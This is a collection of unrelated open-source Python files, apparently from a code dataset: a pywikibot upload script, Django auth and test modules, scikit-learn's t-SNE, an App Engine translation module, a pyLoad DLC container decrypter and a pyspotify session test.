It is possible to combine -abortonwarn and -ignorewarn so that if the specific
warning is given it won't apply the general one but more specific one. So if it
should ignore specific warnings and abort on the rest it's possible by defining
no warning for -abortonwarn and the specific warnings for -ignorewarn. The
order does not matter. If both are unspecific or a warning is specified by
both, it'll prefer aborting.
If any other arguments are given, the first is either URL, filename or
directory to upload, and the rest is a proposed description to go with the
upload. If none of these are given, the user is asked for the directory, file
or URL to upload. The bot will then upload the image to the wiki.
The script will ask for the location of an image(s), if not given as a
parameter, and for a description.
"""
#
# (C) Rob W.W. Hooft, Andre Engels 2003-2004
# (C) Pywikibot team, 2003-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import codecs
import math
import os
import re
import pywikibot
from pywikibot.bot import suggest_help
from pywikibot.specialbots import UploadRobot
CHUNK_SIZE_REGEX = re.compile(
r'-chunked(?::(\d+(?:\.\d+)?)[ \t]*(k|ki|m|mi)?b?)?$', re.I)
def get_chunk_size(match):
"""Get chunk size."""
if not match:
pywikibot.error('Chunk size parameter is not valid.')
chunk_size = 0
elif match.group(1): # number was in there
base = float(match.group(1))
if match.group(2): # suffix too
suffix = match.group(2).lower()
if suffix == 'k':
suffix = 1000
elif suffix == 'm':
suffix = 1000000
elif suffix == 'ki':
suffix = 1 << 10
elif suffix == 'mi':
suffix = 1 << 20
else:
suffix = 1
chunk_size = math.trunc(base * suffix)
else:
chunk_size = 1 << 20 # default to 1 MiB
return chunk_size
def main(*args):
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: str
"""
url = ''
description = []
summary = None
keep_filename = False
always = False
use_filename = None
filename_prefix = None
verify_description = True
aborts = set()
ignorewarn = set()
chunk_size = 0
recursive = False
description_file = None
# process all global bot args
# returns a list of non-global args, i.e. args for upload.py
local_args = pywikibot.handle_args(args)
for option in local_args:
arg, _, value = option.partition(':')
if arg == '-always':
keep_filename = True
always = True
verify_description = False
elif arg == '-recursive':
recursive = True
elif arg == '-keep':
keep_filename = True
elif arg == '-filename':
use_filename = value
elif arg == '-prefix':
filename_prefix = value
elif arg == '-summary':
summary = value
elif arg == '-noverify':
verify_description = False
elif arg == '-abortonwarn':
if value and aborts is not True:
aborts.add(value)
else:
aborts = True
elif arg == '-ignorewarn':
if value and ignorewarn is not True:
ignorewarn.add(value)
else:
ignorewarn = True
elif arg == '-chunked':
match = CHUNK_SIZE_REGEX.match(option)
chunk_size = get_chunk_size(match)
elif arg == '-descfile':
description_file = value
elif not url:
url = option
else:
description.append(option)
description = ' '.join(description)
if description_file:
if description:
pywikibot.error('Both a description and a -descfile were '
'provided. Please specify only one of those.')
return False
with codecs.open(description_file,
encoding=pywikibot.config.textfile_encoding) as f:
description = f.read().replace('\r\n', '\n')
while not ('://' in url or os.path.exists(url)):
if not url:
error = 'No input filename given.'
else:
error = 'Invalid input filename given.'
if not always:
error += ' Try again.'
if always:
url = None
break
else:
pywikibot.output(error)
url = pywikibot.input('URL, file or directory where files are now:')
if always and (aborts is not True and ignorewarn is not True
or not description or url is None):
additional = ''
missing = []
if url is None:
missing += ['filename']
additional = error + ' '
if description is None:
missing += ['description']
if aborts is not True and ignorewarn is not True:
additional += ('Either -ignorewarn or -abortonwarn must be '
'defined for all codes. ')
additional += 'Unable to run in -always mode'
suggest_help(missing_parameters=missing, additional_text=additional)
return False
if os.path.isdir(url):
file_list = []
for directory_info in os.walk(url):
if not recursive:
# Do not visit any subdirectories
directory_info[1][:] = []
for dir_file in directory_info[2]:
file_list.append(os.path.join(directory_info[0], dir_file))
url = file_list
else:
url = [url]
bot = UploadRobot(url, description=description, useFilename=use_filename,
keepFilename=keep_filename,
verifyDescription=verify_description, aborts=aborts,
ignoreWarning=ignorewarn, chunk_size=chunk_size,
always=always, summary=summary,
filename_prefix=filename_prefix)
bot.run()
if __name__ == '__main__':
main()
|
lz1988/django-web
|
refs/heads/master
|
build/lib/django/contrib/auth/management/__init__.py
|
70
|
"""
Creates permissions for all installed apps that need permissions.
"""
from __future__ import unicode_literals
import getpass
import locale
import unicodedata
from django.contrib.auth import models as auth_app, get_user_model
from django.core import exceptions
from django.core.management.base import CommandError
from django.db import DEFAULT_DB_ALIAS, router
from django.db.models import get_models, signals
from django.utils import six
from django.utils.six.moves import input
def _get_permission_codename(action, opts):
return '%s_%s' % (action, opts.object_name.lower())
def _get_all_permissions(opts, ctype):
"""
Returns (codename, name) for all permissions in the given opts.
"""
builtin = _get_builtin_permissions(opts)
custom = list(opts.permissions)
_check_permission_clashing(custom, builtin, ctype)
return builtin + custom
def _get_builtin_permissions(opts):
"""
Returns (codename, name) for all autogenerated permissions.
"""
perms = []
for action in ('add', 'change', 'delete'):
perms.append((_get_permission_codename(action, opts),
'Can %s %s' % (action, opts.verbose_name_raw)))
return perms
def _check_permission_clashing(custom, builtin, ctype):
"""
Check that permissions for a model do not clash. Raises CommandError if
there are duplicate permissions.
"""
pool = set()
builtin_codenames = set(p[0] for p in builtin)
for codename, _name in custom:
if codename in pool:
raise CommandError(
"The permission codename '%s' is duplicated for model '%s.%s'." %
(codename, ctype.app_label, ctype.model_class().__name__))
elif codename in builtin_codenames:
raise CommandError(
"The permission codename '%s' clashes with a builtin permission "
"for model '%s.%s'." %
(codename, ctype.app_label, ctype.model_class().__name__))
pool.add(codename)
def create_permissions(app, created_models, verbosity, db=DEFAULT_DB_ALIAS, **kwargs):
if not router.allow_syncdb(db, auth_app.Permission):
return
from django.contrib.contenttypes.models import ContentType
app_models = get_models(app)
# This will hold the permissions we're looking for as
# (content_type, (codename, name))
searched_perms = list()
# The codenames and ctypes that should exist.
ctypes = set()
for klass in app_models:
# Force looking up the content types in the current database
# before creating foreign keys to them.
ctype = ContentType.objects.db_manager(db).get_for_model(klass)
ctypes.add(ctype)
for perm in _get_all_permissions(klass._meta, ctype):
searched_perms.append((ctype, perm))
# Find all the Permissions that have a context_type for a model we're
# looking for. We don't need to check for codenames since we already have
# a list of the ones we're going to create.
all_perms = set(auth_app.Permission.objects.using(db).filter(
content_type__in=ctypes,
).values_list(
"content_type", "codename"
))
perms = [
auth_app.Permission(codename=codename, name=name, content_type=ctype)
for ctype, (codename, name) in searched_perms
if (ctype.pk, codename) not in all_perms
]
auth_app.Permission.objects.using(db).bulk_create(perms)
if verbosity >= 2:
for perm in perms:
print("Adding permission '%s'" % perm)
def create_superuser(app, created_models, verbosity, db, **kwargs):
from django.core.management import call_command
UserModel = get_user_model()
if UserModel in created_models and kwargs.get('interactive', True):
msg = ("\nYou just installed Django's auth system, which means you "
"don't have any superusers defined.\nWould you like to create one "
"now? (yes/no): ")
confirm = input(msg)
while 1:
if confirm not in ('yes', 'no'):
confirm = input('Please enter either "yes" or "no": ')
continue
if confirm == 'yes':
call_command("createsuperuser", interactive=True, database=db)
break
def get_system_username():
"""
Try to determine the current system user's username.
:returns: The username as a unicode string, or an empty string if the
username could not be determined.
"""
try:
result = getpass.getuser()
except (ImportError, KeyError):
# KeyError will be raised by os.getpwuid() (called by getuser())
# if there is no corresponding entry in the /etc/passwd file
# (a very restricted chroot environment, for example).
return ''
if not six.PY3:
try:
default_locale = locale.getdefaultlocale()[1]
except ValueError:
return ''
if not default_locale:
return ''
try:
result = result.decode(default_locale)
except UnicodeDecodeError:
# UnicodeDecodeError - preventive treatment for non-latin Windows.
return ''
return result
def get_default_username(check_db=True):
"""
Try to determine the current system user's username to use as a default.
:param check_db: If ``True``, requires that the username does not match an
existing ``auth.User`` (otherwise returns an empty string).
:returns: The username, or an empty string if no username can be
determined.
"""
# If the User model has been swapped out, we can't make any assumptions
# about the default user name.
if auth_app.User._meta.swapped:
return ''
default_username = get_system_username()
try:
default_username = unicodedata.normalize('NFKD', default_username)\
.encode('ascii', 'ignore').decode('ascii').replace(' ', '').lower()
except UnicodeDecodeError:
return ''
# Run the username validator
try:
auth_app.User._meta.get_field('username').run_validators(default_username)
except exceptions.ValidationError:
return ''
# Don't return the default username if it is already taken.
if check_db and default_username:
try:
auth_app.User._default_manager.get(username=default_username)
except auth_app.User.DoesNotExist:
pass
else:
return ''
return default_username
signals.post_syncdb.connect(create_permissions,
dispatch_uid="django.contrib.auth.management.create_permissions")
signals.post_syncdb.connect(create_superuser,
sender=auth_app, dispatch_uid="django.contrib.auth.management.create_superuser")
|
unaizalakain/django
|
refs/heads/master
|
django/test/__init__.py
|
341
|
"""
Django Unit Test and Doctest framework.
"""
from django.test.client import Client, RequestFactory
from django.test.testcases import (
LiveServerTestCase, SimpleTestCase, TestCase, TransactionTestCase,
skipIfDBFeature, skipUnlessAnyDBFeature, skipUnlessDBFeature,
)
from django.test.utils import (
ignore_warnings, modify_settings, override_settings,
override_system_checks,
)
__all__ = [
'Client', 'RequestFactory', 'TestCase', 'TransactionTestCase',
'SimpleTestCase', 'LiveServerTestCase', 'skipIfDBFeature',
'skipUnlessAnyDBFeature', 'skipUnlessDBFeature', 'ignore_warnings',
'modify_settings', 'override_settings', 'override_system_checks'
]
# To simplify Django's test suite; not meant as a public API
try:
from unittest import mock # NOQA
except ImportError:
try:
import mock # NOQA
except ImportError:
pass
|
466152112/scikit-learn
|
refs/heads/master
|
sklearn/manifold/t_sne.py
|
106
|
# Author: Alexander Fabisch -- <afabisch@informatik.uni-bremen.de>
# License: BSD 3 clause (C) 2014
# This is the standard t-SNE implementation. There are faster modifications of
# the algorithm:
# * Barnes-Hut-SNE: reduces the complexity of the gradient computation from
# N^2 to N log N (http://arxiv.org/abs/1301.3342)
# * Fast Optimization for t-SNE:
# http://cseweb.ucsd.edu/~lvdmaaten/workshops/nips2010/papers/vandermaaten.pdf
import numpy as np
from scipy import linalg
from scipy.spatial.distance import pdist
from scipy.spatial.distance import squareform
from ..base import BaseEstimator
from ..utils import check_array
from ..utils import check_random_state
from ..utils.extmath import _ravel
from ..decomposition import RandomizedPCA
from ..metrics.pairwise import pairwise_distances
from . import _utils
MACHINE_EPSILON = np.finfo(np.double).eps
def _joint_probabilities(distances, desired_perplexity, verbose):
"""Compute joint probabilities p_ij from distances.
Parameters
----------
distances : array, shape (n_samples * (n_samples-1) / 2,)
Distances of samples are stored as condensed matrices, i.e.
we omit the diagonal and duplicate entries and store everything
in a one-dimensional array.
desired_perplexity : float
Desired perplexity of the joint probability distributions.
verbose : int
Verbosity level.
Returns
-------
P : array, shape (n_samples * (n_samples-1) / 2,)
Condensed joint probability matrix.
"""
# Compute conditional probabilities such that they approximately match
# the desired perplexity
conditional_P = _utils._binary_search_perplexity(
distances, desired_perplexity, verbose)
P = conditional_P + conditional_P.T
sum_P = np.maximum(np.sum(P), MACHINE_EPSILON)
P = np.maximum(squareform(P) / sum_P, MACHINE_EPSILON)
return P
def _kl_divergence(params, P, alpha, n_samples, n_components):
"""t-SNE objective function: KL divergence of p_ijs and q_ijs.
Parameters
----------
params : array, shape (n_params,)
Unraveled embedding.
P : array, shape (n_samples * (n_samples-1) / 2,)
Condensed joint probability matrix.
alpha : float
Degrees of freedom of the Student's-t distribution.
n_samples : int
Number of samples.
n_components : int
Dimension of the embedded space.
Returns
-------
kl_divergence : float
Kullback-Leibler divergence of p_ij and q_ij.
grad : array, shape (n_params,)
Unraveled gradient of the Kullback-Leibler divergence with respect to
the embedding.
"""
X_embedded = params.reshape(n_samples, n_components)
# Q is a heavy-tailed distribution: Student's t-distribution
n = pdist(X_embedded, "sqeuclidean")
n += 1.
n /= alpha
n **= (alpha + 1.0) / -2.0
Q = np.maximum(n / (2.0 * np.sum(n)), MACHINE_EPSILON)
# Optimization trick below: np.dot(x, y) is faster than
# np.sum(x * y) because it calls BLAS
# Objective: C (Kullback-Leibler divergence of P and Q)
kl_divergence = 2.0 * np.dot(P, np.log(P / Q))
# Gradient: dC/dY
grad = np.ndarray((n_samples, n_components))
PQd = squareform((P - Q) * n)
for i in range(n_samples):
np.dot(_ravel(PQd[i]), X_embedded[i] - X_embedded, out=grad[i])
grad = grad.ravel()
c = 2.0 * (alpha + 1.0) / alpha
grad *= c
return kl_divergence, grad
def _gradient_descent(objective, p0, it, n_iter, n_iter_without_progress=30,
momentum=0.5, learning_rate=1000.0, min_gain=0.01,
min_grad_norm=1e-7, min_error_diff=1e-7, verbose=0,
args=None):
"""Batch gradient descent with momentum and individual gains.
Parameters
----------
objective : function or callable
Should return a tuple of cost and gradient for a given parameter
vector.
p0 : array-like, shape (n_params,)
Initial parameter vector.
it : int
Current number of iterations (this function will be called more than
once during the optimization).
n_iter : int
Maximum number of gradient descent iterations.
n_iter_without_progress : int, optional (default: 30)
Maximum number of iterations without progress before we abort the
optimization.
momentum : float, within (0.0, 1.0), optional (default: 0.5)
The momentum generates a weight for previous gradients that decays
exponentially.
learning_rate : float, optional (default: 1000.0)
The learning rate should be extremely high for t-SNE! Values in the
range [100.0, 1000.0] are common.
min_gain : float, optional (default: 0.01)
Minimum individual gain for each parameter.
min_grad_norm : float, optional (default: 1e-7)
If the gradient norm is below this threshold, the optimization will
be aborted.
min_error_diff : float, optional (default: 1e-7)
If the absolute difference of two successive cost function values
is below this threshold, the optimization will be aborted.
verbose : int, optional (default: 0)
Verbosity level.
args : sequence
Arguments to pass to objective function.
Returns
-------
p : array, shape (n_params,)
Optimum parameters.
error : float
Optimum.
i : int
Last iteration.
"""
if args is None:
args = []
p = p0.copy().ravel()
update = np.zeros_like(p)
gains = np.ones_like(p)
error = np.finfo(np.float).max
best_error = np.finfo(np.float).max
best_iter = 0
for i in range(it, n_iter):
new_error, grad = objective(p, *args)
error_diff = np.abs(new_error - error)
error = new_error
grad_norm = linalg.norm(grad)
if error < best_error:
best_error = error
best_iter = i
elif i - best_iter > n_iter_without_progress:
if verbose >= 2:
print("[t-SNE] Iteration %d: did not make any progress "
"during the last %d episodes. Finished."
% (i + 1, n_iter_without_progress))
break
if min_grad_norm >= grad_norm:
if verbose >= 2:
print("[t-SNE] Iteration %d: gradient norm %f. Finished."
% (i + 1, grad_norm))
break
if min_error_diff >= error_diff:
if verbose >= 2:
print("[t-SNE] Iteration %d: error difference %f. Finished."
% (i + 1, error_diff))
break
inc = update * grad >= 0.0
dec = np.invert(inc)
gains[inc] += 0.05
gains[dec] *= 0.95
np.clip(gains, min_gain, np.inf)
grad *= gains
update = momentum * update - learning_rate * grad
p += update
if verbose >= 2 and (i + 1) % 10 == 0:
print("[t-SNE] Iteration %d: error = %.7f, gradient norm = %.7f"
% (i + 1, error, grad_norm))
return p, error, i
def trustworthiness(X, X_embedded, n_neighbors=5, precomputed=False):
"""Expresses to what extent the local structure is retained.
The trustworthiness is within [0, 1]. It is defined as
.. math::
T(k) = 1 - \frac{2}{nk (2n - 3k - 1)} \sum^n_{i=1}
\sum_{j \in U^{(k)}_i (r(i, j) - k)}
where :math:`r(i, j)` is the rank of the embedded datapoint j
according to the pairwise distances between the embedded datapoints,
:math:`U^{(k)}_i` is the set of points that are in the k nearest
neighbors in the embedded space but not in the original space.
* "Neighborhood Preservation in Nonlinear Projection Methods: An
Experimental Study"
J. Venna, S. Kaski
* "Learning a Parametric Embedding by Preserving Local Structure"
L.J.P. van der Maaten
Parameters
----------
X : array, shape (n_samples, n_features) or (n_samples, n_samples)
If the metric is 'precomputed' X must be a square distance
matrix. Otherwise it contains a sample per row.
X_embedded : array, shape (n_samples, n_components)
Embedding of the training data in low-dimensional space.
n_neighbors : int, optional (default: 5)
Number of neighbors k that will be considered.
precomputed : bool, optional (default: False)
Set this flag if X is a precomputed square distance matrix.
Returns
-------
trustworthiness : float
Trustworthiness of the low-dimensional embedding.
"""
if precomputed:
dist_X = X
else:
dist_X = pairwise_distances(X, squared=True)
dist_X_embedded = pairwise_distances(X_embedded, squared=True)
ind_X = np.argsort(dist_X, axis=1)
ind_X_embedded = np.argsort(dist_X_embedded, axis=1)[:, 1:n_neighbors + 1]
n_samples = X.shape[0]
t = 0.0
ranks = np.zeros(n_neighbors)
for i in range(n_samples):
for j in range(n_neighbors):
ranks[j] = np.where(ind_X[i] == ind_X_embedded[i, j])[0][0]
ranks -= n_neighbors
t += np.sum(ranks[ranks > 0])
t = 1.0 - t * (2.0 / (n_samples * n_neighbors *
(2.0 * n_samples - 3.0 * n_neighbors - 1.0)))
return t
class TSNE(BaseEstimator):
"""t-distributed Stochastic Neighbor Embedding.
t-SNE [1] is a tool to visualize high-dimensional data. It converts
similarities between data points to joint probabilities and tries
to minimize the Kullback-Leibler divergence between the joint
probabilities of the low-dimensional embedding and the
high-dimensional data. t-SNE has a cost function that is not convex,
i.e. with different initializations we can get different results.
It is highly recommended to use another dimensionality reduction
method (e.g. PCA for dense data or TruncatedSVD for sparse data)
to reduce the number of dimensions to a reasonable amount (e.g. 50)
if the number of features is very high. This will suppress some
noise and speed up the computation of pairwise distances between
samples. For more tips see Laurens van der Maaten's FAQ [2].
Read more in the :ref:`User Guide <t_sne>`.
Parameters
----------
n_components : int, optional (default: 2)
Dimension of the embedded space.
perplexity : float, optional (default: 30)
The perplexity is related to the number of nearest neighbors that
is used in other manifold learning algorithms. Larger datasets
usually require a larger perplexity. Consider selcting a value
between 5 and 50. The choice is not extremely critical since t-SNE
is quite insensitive to this parameter.
early_exaggeration : float, optional (default: 4.0)
Controls how tight natural clusters in the original space are in
the embedded space and how much space will be between them. For
larger values, the space between natural clusters will be larger
in the embedded space. Again, the choice of this parameter is not
very critical. If the cost function increases during initial
optimization, the early exaggeration factor or the learning rate
might be too high.
learning_rate : float, optional (default: 1000)
The learning rate can be a critical parameter. It should be
between 100 and 1000. If the cost function increases during initial
optimization, the early exaggeration factor or the learning rate
might be too high. If the cost function gets stuck in a bad local
minimum increasing the learning rate helps sometimes.
n_iter : int, optional (default: 1000)
Maximum number of iterations for the optimization. Should be at
least 200.
metric : string or callable, optional
The metric to use when calculating distance between instances in a
feature array. If metric is a string, it must be one of the options
allowed by scipy.spatial.distance.pdist for its metric parameter, or
a metric listed in pairwise.PAIRWISE_DISTANCE_FUNCTIONS.
If metric is "precomputed", X is assumed to be a distance matrix.
Alternatively, if metric is a callable function, it is called on each
pair of instances (rows) and the resulting value recorded. The callable
should take two arrays from X as input and return a value indicating
the distance between them. The default is "euclidean" which is
interpreted as squared euclidean distance.
init : string, optional (default: "random")
Initialization of embedding. Possible options are 'random' and 'pca'.
PCA initialization cannot be used with precomputed distances and is
usually more globally stable than random initialization.
verbose : int, optional (default: 0)
Verbosity level.
random_state : int or RandomState instance or None (default)
Pseudo Random Number generator seed control. If None, use the
numpy.random singleton. Note that different initializations
might result in different local minima of the cost function.
Attributes
----------
embedding_ : array-like, shape (n_samples, n_components)
Stores the embedding vectors.
training_data_ : array-like, shape (n_samples, n_features)
Stores the training data.
Examples
--------
>>> import numpy as np
>>> from sklearn.manifold import TSNE
>>> X = np.array([[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 1]])
>>> model = TSNE(n_components=2, random_state=0)
>>> model.fit_transform(X) # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
array([[ 887.28..., 238.61...],
[ -714.79..., 3243.34...],
[ 957.30..., -2505.78...],
[-1130.28..., -974.78...])
References
----------
[1] van der Maaten, L.J.P.; Hinton, G.E. Visualizing High-Dimensional Data
Using t-SNE. Journal of Machine Learning Research 9:2579-2605, 2008.
[2] van der Maaten, L.J.P. t-Distributed Stochastic Neighbor Embedding
http://homepage.tudelft.nl/19j49/t-SNE.html
"""
def __init__(self, n_components=2, perplexity=30.0,
early_exaggeration=4.0, learning_rate=1000.0, n_iter=1000,
metric="euclidean", init="random", verbose=0,
random_state=None):
if init not in ["pca", "random"]:
raise ValueError("'init' must be either 'pca' or 'random'")
self.n_components = n_components
self.perplexity = perplexity
self.early_exaggeration = early_exaggeration
self.learning_rate = learning_rate
self.n_iter = n_iter
self.metric = metric
self.init = init
self.verbose = verbose
self.random_state = random_state
def fit(self, X, y=None):
"""Fit the model using X as training data.
Parameters
----------
X : array, shape (n_samples, n_features) or (n_samples, n_samples)
If the metric is 'precomputed' X must be a square distance
matrix. Otherwise it contains a sample per row.
"""
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'], dtype=np.float64)
random_state = check_random_state(self.random_state)
if self.early_exaggeration < 1.0:
raise ValueError("early_exaggeration must be at least 1, but is "
"%f" % self.early_exaggeration)
if self.n_iter < 200:
raise ValueError("n_iter should be at least 200")
if self.metric == "precomputed":
if self.init == 'pca':
raise ValueError("The parameter init=\"pca\" cannot be used "
"with metric=\"precomputed\".")
if X.shape[0] != X.shape[1]:
raise ValueError("X should be a square distance matrix")
distances = X
else:
if self.verbose:
print("[t-SNE] Computing pairwise distances...")
if self.metric == "euclidean":
distances = pairwise_distances(X, metric=self.metric, squared=True)
else:
distances = pairwise_distances(X, metric=self.metric)
# Degrees of freedom of the Student's t-distribution. The suggestion
# alpha = n_components - 1 comes from "Learning a Parametric Embedding
# by Preserving Local Structure" Laurens van der Maaten, 2009.
alpha = max(self.n_components - 1.0, 1)
n_samples = X.shape[0]
self.training_data_ = X
P = _joint_probabilities(distances, self.perplexity, self.verbose)
if self.init == 'pca':
pca = RandomizedPCA(n_components=self.n_components,
random_state=random_state)
X_embedded = pca.fit_transform(X)
elif self.init == 'random':
X_embedded = None
else:
raise ValueError("Unsupported initialization scheme: %s"
% self.init)
self.embedding_ = self._tsne(P, alpha, n_samples, random_state,
X_embedded=X_embedded)
return self
def _tsne(self, P, alpha, n_samples, random_state, X_embedded=None):
"""Runs t-SNE."""
# t-SNE minimizes the Kullback-Leiber divergence of the Gaussians P
# and the Student's t-distributions Q. The optimization algorithm that
# we use is batch gradient descent with three stages:
# * early exaggeration with momentum 0.5
# * early exaggeration with momentum 0.8
# * final optimization with momentum 0.8
# The embedding is initialized with iid samples from Gaussians with
# standard deviation 1e-4.
if X_embedded is None:
# Initialize embedding randomly
X_embedded = 1e-4 * random_state.randn(n_samples,
self.n_components)
params = X_embedded.ravel()
# Early exaggeration
P *= self.early_exaggeration
params, error, it = _gradient_descent(
_kl_divergence, params, it=0, n_iter=50, momentum=0.5,
min_grad_norm=0.0, min_error_diff=0.0,
learning_rate=self.learning_rate, verbose=self.verbose,
args=[P, alpha, n_samples, self.n_components])
params, error, it = _gradient_descent(
_kl_divergence, params, it=it + 1, n_iter=100, momentum=0.8,
min_grad_norm=0.0, min_error_diff=0.0,
learning_rate=self.learning_rate, verbose=self.verbose,
args=[P, alpha, n_samples, self.n_components])
if self.verbose:
print("[t-SNE] Error after %d iterations with early "
"exaggeration: %f" % (it + 1, error))
# Final optimization
P /= self.early_exaggeration
params, error, it = _gradient_descent(
_kl_divergence, params, it=it + 1, n_iter=self.n_iter,
momentum=0.8, learning_rate=self.learning_rate,
verbose=self.verbose, args=[P, alpha, n_samples,
self.n_components])
if self.verbose:
print("[t-SNE] Error after %d iterations: %f" % (it + 1, error))
X_embedded = params.reshape(n_samples, self.n_components)
return X_embedded
def fit_transform(self, X, y=None):
"""Transform X to the embedded space.
Parameters
----------
X : array, shape (n_samples, n_features) or (n_samples, n_samples)
If the metric is 'precomputed' X must be a square distance
matrix. Otherwise it contains a sample per row.
Returns
-------
X_new : array, shape (n_samples, n_components)
Embedding of the training data in low-dimensional space.
"""
self.fit(X)
return self.embedding_
|
dvliman/jaikuengine
|
refs/heads/master
|
.google_appengine/google/appengine/_internal/django/utils/translation/__init__.py
|
23
|
"""
Internationalization support.
"""
from google.appengine._internal.django.utils.encoding import force_unicode
from google.appengine._internal.django.utils.functional import lazy, curry
__all__ = ['gettext', 'gettext_noop', 'gettext_lazy', 'ngettext',
'ngettext_lazy', 'string_concat', 'activate', 'deactivate',
'get_language', 'get_language_bidi', 'get_date_formats',
'get_partial_date_formats', 'check_for_language', 'to_locale',
'get_language_from_request', 'templatize', 'ugettext', 'ugettext_lazy',
'ungettext', 'deactivate_all']
# Here be dragons, so a short explanation of the logic won't hurt:
# We are trying to solve two problems: (1) access settings, in particular
# settings.USE_I18N, as late as possible, so that modules can be imported
# without having to first configure Django, and (2) if some other code creates
# a reference to one of these functions, don't break that reference when we
# replace the functions with their real counterparts (once we do access the
# settings).
def delayed_loader(real_name, *args, **kwargs):
"""
Call the real, underlying function. We have a level of indirection here so
that modules can use the translation bits without actually requiring
Django's settings bits to be configured before import.
"""
from google.appengine._internal.django.conf import settings
if settings.USE_I18N:
from google.appengine._internal.django.utils.translation import trans_real as trans
else:
from google.appengine._internal.django.utils.translation import trans_null as trans
# Make the originally requested function call on the way out the door.
return getattr(trans, real_name)(*args, **kwargs)
g = globals()
for name in __all__:
g['real_%s' % name] = curry(delayed_loader, name)
del g, delayed_loader
def gettext_noop(message):
return real_gettext_noop(message)
ugettext_noop = gettext_noop
def gettext(message):
return real_gettext(message)
def ngettext(singular, plural, number):
return real_ngettext(singular, plural, number)
def ugettext(message):
return real_ugettext(message)
def ungettext(singular, plural, number):
return real_ungettext(singular, plural, number)
ngettext_lazy = lazy(ngettext, str)
gettext_lazy = lazy(gettext, str)
ungettext_lazy = lazy(ungettext, unicode)
ugettext_lazy = lazy(ugettext, unicode)
def activate(language):
return real_activate(language)
def deactivate():
return real_deactivate()
def get_language():
return real_get_language()
def get_language_bidi():
return real_get_language_bidi()
def get_date_formats():
return real_get_date_formats()
def get_partial_date_formats():
return real_get_partial_date_formats()
def check_for_language(lang_code):
return real_check_for_language(lang_code)
def to_locale(language):
return real_to_locale(language)
def get_language_from_request(request):
return real_get_language_from_request(request)
def templatize(src):
return real_templatize(src)
def deactivate_all():
return real_deactivate_all()
def _string_concat(*strings):
"""
Lazy variant of string concatenation, needed for translations that are
constructed from multiple parts.
"""
return u''.join([force_unicode(s) for s in strings])
string_concat = lazy(_string_concat, unicode)
|
GammaC0de/pyload
|
refs/heads/master
|
src/pyload/plugins/containers/DLC.py
|
1
|
# -*- coding: utf-8 -*-
import base64
import os
import re
import xml.dom.minidom
from cryptography.fernet import Fernet
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from pyload.core.utils.old import decode
from ..base.container import BaseContainer
class DLC(BaseContainer):
__name__ = "DLC"
__type__ = "container"
__version__ = "0.32"
__status__ = "testing"
__pyload_version__ = "0.5"
__pattern__ = r"(.+\.dlc|[\w\+^_]+==[\w\+^_/]+==)$"
__config__ = [
("enabled", "bool", "Activated", True),
("use_premium", "bool", "Use premium account if available", True),
(
"folder_per_package",
"Default;Yes;No",
"Create folder for each package",
"Default",
),
]
__description__ = """DLC container decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [
("RaNaN", "RaNaN@pyload.net"),
("spoob", "spoob@pyload.net"),
("mkaay", "mkaay@mkaay.de"),
("Schnusch", "Schnusch@users.noreply.github.com"),
("Walter Purcaro", "vuolter@gmail.com"),
("GammaC0de", "nitzo2001[AT]yahoo[DOT]com"),
]
KEY = "cb99b5cbc24db398"
IV = "9bc24cb995cb8db3"
API_URL = "http://service.jdownloader.org/dlcrypt/service.php?srcType=dlc&destType=pylo&data={}"
def decrypt(self, pyfile):
fs_filename = os.fsdecode(pyfile.url)
with open(fs_filename) as dlc:
data = dlc.read().strip()
data += "=" * (-len(data) % 4)
dlc_key = data[-88:]
dlc_data = base64.b64decode(data[:-88])
dlc_content = self.load(self.API_URL.format(dlc_key))
try:
rc = base64.b64decode(
re.search(r"<rc>(.+)</rc>", dlc_content, re.S).group(1)
)[:16]
except AttributeError:
self.fail(self._("Container is corrupted"))
cipher = Cipher(
algorithms.AES(self.KEY), modes.CBC(self.IV), backend=default_backend()
)
decryptor = cipher.decryptor()
key = decryptor.update(rc) + decryptor.finalize()
self.data = base64.b64decode(Fernet(key).decrypt(dlc_data))
self.packages = [
(name or pyfile.name, links, name or pyfile.name)
for name, links in self.get_packages()
]
def get_packages(self):
root = xml.dom.minidom.parseString(self.data).documentElement
content = root.getElementsByTagName("content")[0]
return self.parse_packages(content)
def parse_packages(self, start_node):
return [
(
base64.b64decode(decode(node.getAttribute("name"))),
self.parse_links(node),
)
for node in start_node.getElementsByTagName("package")
]
def parse_links(self, start_node):
return [
base64.b64decode(node.getElementsByTagName("url")[0].firstChild.data)
for node in start_node.getElementsByTagName("file")
]
|
jodal/pyspotify
|
refs/heads/v2.x/develop
|
tests/test_session.py
|
3
|
# encoding: utf-8
from __future__ import unicode_literals
import unittest
import spotify
from spotify.session import _SessionCallbacks
import tests
from tests import mock
@mock.patch('spotify.session.lib', spec=spotify.lib)
class SessionTest(unittest.TestCase):
def tearDown(self):
spotify._session_instance = None
def test_raises_error_if_a_session_already_exists(self, lib_mock):
tests.create_real_session(lib_mock)
with self.assertRaises(RuntimeError):
tests.create_real_session(lib_mock)
@mock.patch('spotify.Config')
def test_creates_config_if_none_provided(self, config_cls_mock, lib_mock):
lib_mock.sp_session_create.return_value = spotify.ErrorType.OK
session = spotify.Session()
config_cls_mock.assert_called_once_with()
self.assertEqual(session.config, config_cls_mock.return_value)
@mock.patch('spotify.Config')
def test_tries_to_load_application_key_if_none_provided(
self, config_cls_mock, lib_mock):
lib_mock.sp_session_create.return_value = spotify.ErrorType.OK
config_mock = config_cls_mock.return_value
config_mock.application_key = None
spotify.Session()
config_mock.load_application_key_file.assert_called_once_with()
def test_raises_error_if_not_ok(self, lib_mock):
lib_mock.sp_session_create.return_value = (
spotify.ErrorType.BAD_API_VERSION)
config = spotify.Config()
config.application_key = b'\x01' * 321
with self.assertRaises(spotify.Error):
spotify.Session(config=config)
def test_releases_sp_session_when_session_dies(self, lib_mock):
sp_session = spotify.ffi.NULL
def func(sp_session_config, sp_session_ptr):
sp_session_ptr[0] = sp_session
return spotify.ErrorType.OK
lib_mock.sp_session_create.side_effect = func
config = spotify.Config()
config.application_key = b'\x01' * 321
session = spotify.Session(config=config)
session = None # noqa
spotify._session_instance = None
tests.gc_collect()
